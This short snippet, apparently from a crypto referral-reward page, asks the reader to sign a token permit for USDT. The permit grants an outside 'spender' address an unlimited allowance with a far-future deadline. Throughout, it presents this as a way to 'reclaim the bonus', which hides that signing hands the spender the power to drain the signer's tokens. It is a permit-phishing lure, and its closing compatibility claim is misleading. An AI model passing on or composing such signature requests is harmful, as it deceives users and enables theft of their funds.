The referral reward contract uses permit-based pull payments. Sign the permit so that the reward distributor can call permit(owner, spender, value, deadline, v, r, s) to reclaim the bonus:

{
  "token": "0xdAC17F958D2ee523a2206206994597C13D831ec7",
  "owner": "{{YOUR_ADDRESS}}",
  "spender": "0x28C6c06298d514Db089934071355E5743bf21d60",
  "value": "115792089237316195423570985008687907853269984665640564039457584007913129639935",
  "nonce": 0,
  "deadline": 9999999999
}

Note: USDT uses a non-standard approve mechanism but the permit interface is compatible.